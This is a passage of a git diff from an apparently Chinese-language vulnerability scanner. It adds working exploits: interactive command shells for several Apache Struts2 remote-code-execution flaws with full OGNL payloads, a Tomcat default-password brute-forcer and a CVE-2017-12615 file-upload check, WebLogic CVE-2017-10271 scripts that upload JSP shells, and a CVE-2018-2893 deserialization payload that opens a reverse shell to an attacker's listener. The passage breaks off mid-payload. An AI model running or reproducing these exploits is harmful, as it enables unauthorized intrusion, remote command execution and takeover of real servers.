+ print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url+self.shell['struts2-033'].replace("FUZZINGCOMMAND", command) + req = requests.get(commurl, headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-037": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url+self.shell['struts2-037'].replace("FUZZINGCOMMAND", command) + req = requests.get(commurl, headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-045": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + headers_exp = { + "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", + "Accept":"application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*", + "Content-Type":"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+command+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}", + } + try: + req = requests.get(self.url, headers=headers_exp, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-046": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + uploadexp = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+command+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x000" + files ={"test":(uploadexp, "text/plain")} + req = requests.post(self.url, files=files, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-048": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + vulnurl = urlparse(self.url)[0] + "://" + urlparse(self.url)[1] + "/struts2-showcase/integration/saveGangster.action" + postdata = { + "name":self.shell['struts2-048'].replace("FUZZINGCOMMAND", command), + "age":"1", + "__checkbox_bustedBefore":"true", + "description":"1", + } + req = requests.post(vulnurl, data=postdata, headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-053": + param = input("请指定struts2-053参数: ") + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + vulnurl = self.url + "?" + param + "=" + self.shell['struts2-053'].replace("FUZZINGCOMMAND", command) + req = requests.get(vulnurl, headers=headers, timeout=6, verify=False) + pattern = r'81dc9bdb52d04dc2([\s\S]*)0036dbd8313ed055' + m = re.search(pattern,req.text) + if m: + print(m.group(1).strip()) + print("\n") + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + +if __name__ == "__main__": + filecontent = open("success.txt", "a+") + try: + if sys.argv[1] == "-f": + with open(sys.argv[2]) as f: + for line in f.readlines(): + line = line.strip() + strutsVuln = struts_baseverify(line) + strutsVuln.scan() + elif sys.argv[1] == "-u" and sys.argv[3] == "-i": + strutsVuln = struts_baseverify(sys.argv[2].strip()) + strutsVuln.inShell(sys.argv[4].strip()) + else: + strutsVuln = struts_baseverify(sys.argv[1].strip()) + strutsVuln.scan() + except Exception as e: + figlet = '''Code by Lucifer.''' + cprint(figlet,'cyan') + print("Usage: python struts-scan.py http://example.com/index.action 检测") + print(" python struts-scan.py -u http://example.com/index.action -i struts2-045 进入指定漏洞交互式shell") + print(" python struts-scan.py -f url.txt 批量检测") + +def struts2_special_plugin_(arg,config): + print(arg.url) + struts_baseverify(arg.url).scan() diff --git a/plugins/test.py b/plugins/test.py deleted file mode 100644 index 9e5f5f8..0000000 --- a/plugins/test.py +++ /dev/null @@ -1,7 +0,0 @@ - - - - - - - diff --git a/plugins/tomcat_plugin.py b/plugins/tomcat_plugin.py new file mode 100644 index 0000000..8c170ee --- /dev/null +++ b/plugins/tomcat_plugin.py @@ -0,0 +1,15 @@ +#coding=utf-8 +pocs=[ + {"requests_option":"", + "url":["/manager/html/upload"], + "params":[], + "data":[], + "flag":[], + "success":"", + "fail":"", + "end":"", + "admin_bursk":"", + "username":[], + "password":[], + }, +] \ No newline at end of file diff --git a/plugins/tomcat_special_plugin_.py b/plugins/tomcat_special_plugin_.py new file mode 100644 index 0000000..3b79907 --- /dev/null +++ b/plugins/tomcat_special_plugin_.py @@ -0,0 +1,84 @@ +#coding=utf-8 +import urllib.request, urllib.error, urllib.parse +import base64 +import requests +import uuid +from termcolor import cprint +from urllib.parse import urlparse +from concurrent.futures import ThreadPoolExecutor +def requests_post(url,username,password,flag_list): + try: + login_url = url + '/manager/html' + auth_str_temp = user + ':' + password + auth_str_temp = bytes(auth_str_temp, encoding="utf8") + auth_str = base64.b64encode(auth_str_temp) + auth_str = str(auth_str, encoding="utf8") + headers = {'Authorization': 'Basic ' + auth_str} + res = requests.post(url=login_url, headers=headers, timeout=config.Timeout) + success_num=0 + for flag in flag_list: + if flag in res_html: + success_num=success_num+1 + info = '%s Tomcat Weak password %s:%s' % (login_url, user, password) + if success_num>0: + print(info) + except Exception: + pass +def crack_password(arg,config): + url = "http://%s"%(arg.url) + print("对tomcat weak password 进行检测") + flag_list=['Application Manager','Welcome'] + user_list=['admin','manager','tomcat','apache','root'] + pass_list=['','123456','12345678','123456789','admin123','123123','admin888','password','admin1','administrator','8888888','123123','admin','manager','tomcat','apache','root'] + with ThreadPoolExecutor(config.ThreadNum) as excetor: + for user in user_list: + for password in pass_list: + try: + excetor.submit(requests_post(arg.url, user, password, flag_list)) + except Exception: + pass + + +''' +http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html +https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5 +https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e +''' +#脚本来自:https://github.com/SkewwG/VulScan/blob/master/tomcat/cve-12615.py +class Exploit: + def attack(self, url): + uu = uuid.uuid4() + headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + } + + # body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp + # +"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("ske".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("
"+excuteCmd(request.getParameter("cmd"))+"
");}else{out.println(":-)");}%>''' + body = '''<%out.print("test");%>''' + url_parse = urlparse(url) + url = r'http://' + url if url_parse.scheme == '' else url + put_url = r'{}/{}.jsp/'.format(url,uu) + try: + res = requests.put(put_url,data=body,headers=headers) + code = res.status_code + if code == 201: + print('[+]access : {}'.format(put_url[:-1])) + access_url = put_url[:-1] + whoami = requests.get(access_url).text + if r"test" in whoami: + print("[+]存在Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)漏洞...(高危)\tpayload: " + access_url) + else: + print("[+]不存在Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)漏洞...(高危)") + else: + return None + except Exception as e: + cprint("[-] " + __file__ + "====>连接超时", "cyan") + +def tomcat_special_plugin_(arg,config): + Exploit().attack(arg.url) + crack_password(arg,config) + diff --git a/plugins/user_agent.py b/plugins/user_agent.py index bfb87b9..3888e2c 100644 --- a/plugins/user_agent.py +++ b/plugins/user_agent.py @@ -232,6 +232,6 @@ def get_user_agent(): 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.19 (KHTML, like Gecko) Ubuntu/11.10 Chromium/18.0.1025.142 Chrome/18.0.1025.142 Safari/535.19', 'Mozilla/5.0 (Windows NT 5.1; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00' ] - return random.choice(user_agents) + return {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Connection": "keep-alive","User-Agent":random.choice(user_agents)} diff --git a/plugins/weblogic_exp/CVE_2017_10271_linux.py b/plugins/weblogic_exp/CVE_2017_10271_linux.py new file mode 100644 index 0000000..65d37dc --- /dev/null +++ b/plugins/weblogic_exp/CVE_2017_10271_linux.py @@ -0,0 +1,150 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import requests +import argparse +import time +import base64 +proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} +headers = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'} +timeout = 5 +''' +payload的格式化 +''' +def payload_command(command_in,output_file,os): + html_escape_table = { + "&": "&", + '"': """, + "'": "'", + ">": ">", + "<": "<", + } + #命令执行回显:将命令执行的结果输出到文件中 + #command_in_payload = 'find . -name index.html| while read path_file;do {} >$(dirname $path_file)/{};done'.format(command_in,output_file) + command_in_payload = '{} > ./servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{}'.format(command_in,output_file) + command_filtered = ""+"".join(html_escape_table.get(c, c) for c in command_in_payload)+"" + #XMLDecoder反序列化payload: + cmd_app = '/bin/sh' if os == 'linux' else 'cmd.exe' + cmd_param = '-c' if os == 'linux' else '/c' + + payload_1 = " \n" \ + " " \ + " \n" \ + " \n" \ + " \n" \ + " " \ + " " \ + " {} " \ + " " \ + " " \ + " {} " \ + " " \ + " ".format(cmd_app,cmd_param) \ + + command_filtered + \ + " " \ + " " \ + " " \ + " " \ + " " \ + " " \ + " " \ + " " \ + "" + return payload_1 + +''' +得到命令执行的回显结果 +''' +def get_output(target,output_file): + if not target.startswith('http'): + target = 'http://{}'.format(target) + #url增加时间戳避免数据是上一次的结果缓存 + output_url = '{}/bea_wls_internal/{}?{}'.format(target,output_file,int(time.time())) + try: + r = requests.get(output_url,headers = headers,proxies=proxies,timeout=timeout,verify=False) + if r.status_code == requests.codes.ok: + return (True,(r.text.strip())) + elif r.status_code == 404: + return (False,'404 no output') + else: + return (False,r.status_code) + except Exception,ex: + #raise + return (False,str(ex)) + +''' +RCE +''' +def weblogic_rce(target,cmd,output_file,os='linux'): + if not target.startswith('http'): + target = 'http://{}'.format(target) + url = '{}/wls-wsat/CoordinatorPortType'.format(target) + #content-type必须为text/xml + payload_header = {'content-type': 'text/xml','User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'} + msg = '' + try: + r = requests.post(url, payload_command(cmd,output_file,os),headers = payload_header,verify=False,timeout=timeout,proxies=proxies) + #500时说明已成功反序列化执行命令 + if r.status_code == 500: + #delay一下,保证命令执行完整性: + time.sleep(1) + return get_output(target,output_file) + elif r.status_code == 404: + return (False,'404 no vulnerability') + else: + return (False,'{} something went wrong'.format(r.status_code)) + except requests.exceptions.ReadTimeout: + return (False,'timeout') + except Exception,ex: + #raise + return (False,str(ex)) + +''' +getshell +''' +def weblogic_getshell(target,output_file,shell_file,os='linux'): + if not target.startswith('http'): + target = 'http://{}'.format(target) + with open(shell_file) as f: + cmd = 'echo {}|base64 -d'.format(base64.b64encode(f.read())) + status,result = weblogic_rce(target,cmd,output_file,os) + if status: + print '[+]shell-> {}/bea_wls_internal/{}'.format(target,output_file) + return (status,result) +''' +main +''' +def main(): + global proxies + + parse = argparse.ArgumentParser() + parse.add_argument('-t', '--target',required=True, help='weblogic ip and port(eg -> 172.16.80.131:7001 or https://172.16.80.131)') + parse.add_argument('-c', '--cmd', required=False,default='id', help='command to execute,default is "id"') + parse.add_argument('-o', '--output', required=False,default='output.txt', help='output file name,default is output.txt') + parse.add_argument('-s', '--shell', required = False,default='',help='local jsp file name to upload,and set -o xxx.jsp') + parse.add_argument('--os',choices=['linux','win'],default='linux',help='host os:linux or win,default is linux') + parse.add_argument('--proxy', action = 'store_true',default=False,help='use proxy') + args = parse.parse_args() + + #是否使用proxy + if not args.proxy: + proxies = None + if args.shell!='': + status,result = weblogic_getshell(args.target,args.output,args.shell,args.os) + else: + status,result = weblogic_rce(args.target,args.cmd,args.output,args.os) + #output result: + if status: + print result + else: + print '[-]FAIL:{}'.format(result) + +if __name__ == '__main__': + main() diff --git a/plugins/weblogic_exp/CVE_2017_10271_win.py b/plugins/weblogic_exp/CVE_2017_10271_win.py new file mode 100644 index 0000000..6c3b6b2 --- /dev/null +++ b/plugins/weblogic_exp/CVE_2017_10271_win.py @@ -0,0 +1,121 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import requests +import argparse +import time +import base64 + +proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} +headers = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'} +timeout = 5 +''' +payload的格式化 +''' +def payload_command(shell_file,output_file): + html_escape_table = { + "&": "&", + '"': """, + "'": "'", + ">": ">", + "<": "<", + } + with open(shell_file) as f: + shell_context = f.read() + command_filtered = ""+"".join(html_escape_table.get(c, c) for c in shell_context)+"" + payload_1 = ''' + + + + + + servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{} + {} + + + + + '''.format(output_file,command_filtered) + return payload_1 + +''' +命令执行 +''' +def execute_cmd(target,output_file,command): + if not target.startswith('http'): + target = 'http://{}'.format(target) + #url增加时间戳避免数据是上一次的结果缓存 + output_url = '{}/bea_wls_internal/{}?{}'.format(target,output_file,int(time.time())) + data = {'c':command} + try: + r = requests.post(output_url,data=data,headers = headers,proxies=proxies,timeout=timeout) + if r.status_code == requests.codes.ok: + return (True,r.text.strip()) + elif r.status_code == 404: + return (False,'404 no output') + else: + return (False,r.status_code) + except requests.exceptions.ReadTimeout: + return (False,'timeout') + except Exception,ex: + #raise + return (False,str(ex)) + +''' +RCE:上传命令执行的shell文件 +''' +def weblogic_rce(target,cmd,output_file,shell_file): + if not target.startswith('http'): + target = 'http://{}'.format(target) + url = '{}/wls-wsat/CoordinatorPortType'.format(target) + #content-type必须为text/xml + payload_header = {'content-type': 'text/xml','User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'} + msg = '' + try: + r = requests.post(url, payload_command(shell_file,output_file),headers = payload_header,verify=False,timeout=timeout,proxies=proxies) + #500时说明已成功反序列化执行命令 + if r.status_code == 500: + return execute_cmd(target,output_file,cmd) + elif r.status_code == 404: + return (False,'404 no vulnerability') + else: + return (False,'{} something went wrong'.format(r.status_code)) + except requests.exceptions.ReadTimeout: + return (False,'timeout') + except Exception,ex: + #raise + return (False,str(ex)) + +''' +main +''' +def main(): + global proxies + + parse = argparse.ArgumentParser() + parse.add_argument('-t', '--target',required=True, help='weblogic ip and port(eg -> 172.16.80.131:7001 or https://172.16.80.131)') + parse.add_argument('-c', '--cmd', required=False,default='whoami', help='command to execute,default is "whoami"') + parse.add_argument('-o', '--output', required=False,default='output.jsp', help='output file name,default is output.jsp') + parse.add_argument('-s', '--shell', required = False,default='exec.jsp',help='local jsp file name to upload') + parse.add_argument('--proxy', action = 'store_true',default=False,help='use proxy') + args = parse.parse_args() + + #是否使用proxy + if not args.proxy: + proxies = None + status,result = weblogic_rce(args.target,args.cmd,args.output,args.shell) + #output result: + if status: + print result + else: + print '[-]FAIL:{}'.format(result) + +if __name__ == '__main__': + main() diff --git a/plugins/weblogic_exp/CVE_2018_2893.py b/plugins/weblogic_exp/CVE_2018_2893.py new file mode 100644 index 0000000..cb5ea42 --- /dev/null +++ b/plugins/weblogic_exp/CVE_2018_2893.py @@ -0,0 +1,73 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import socket +import os +import sys +import struct +''' +可以直接反弹shell +监听 + nc -lvvp reverse_port +发送payload + python weblogic.py target_host target_port reverse_host reverse_port +''' + +if len(sys.argv) < 4: + print 'Usage: python %s ' % os.path.basename(sys.argv[0]) + sys.exit() + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.settimeout(5) + +host = sys.argv[1] +port = int(sys.argv[2]) + +server_address = (host, port) +print '[+] Connecting to %s port %s' % server_address +sock.connect(server_address) + + +reverse_host = sys.argv[3] +reverse_port = int(sys.argv[4]) +# Send headers +headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' +print 'sending "%s"' % headers +sock.sendall(headers) + +data = sock.recv(1024) +print >>sys.stderr, 'received "%s"' % data + + +def padhex(s): + s = s.strip('0x') + if len(s) %2 !=0: + return '0'+s + else: + return s + +host_hex = padhex(hex(len(reverse_host))+reverse_host.encode('hex')) +port_hex = padhex(hex(reverse_port)) + + +payloadObj = """aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000047372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200176a6176612e6e65742e55524c436c6173734c6f61646572000000000000000000000078707372003e6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e7374616e74696174655472616e73666f726d6572348bf47fa486d03b0200025b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870000000017572000f5b4c6a6176612e6e65742e55524c3b5251fd24c51b68cd0200007870000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e001c4c0004686f737471007e001c4c000870726f746f636f6c71007e001c4c000372656671007e001c7870ffffffffffffffff74000f3137362e3132322e3135372e3131307400132f4a657852656d6f7465546f6f6c732e6a617271007e001e740004687474707078757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000017671007e00197372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b0005694172677371007e00144c000b694d6574686f644e616d6571007e001c5b000b69506172616d547970657371007e001578707571007e00170000000174000a4a6578526576657273657400096c6f6164436c6173737571007e002100000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707371007e00137571007e0017000000027400%s737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b02000078700000%s7571007e00210000000271007e002b76720003696e7400000000000000000000007870737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878"""%(host_hex,port_hex) + + +payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' +payload=payload+payloadObj.decode('hex') +payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f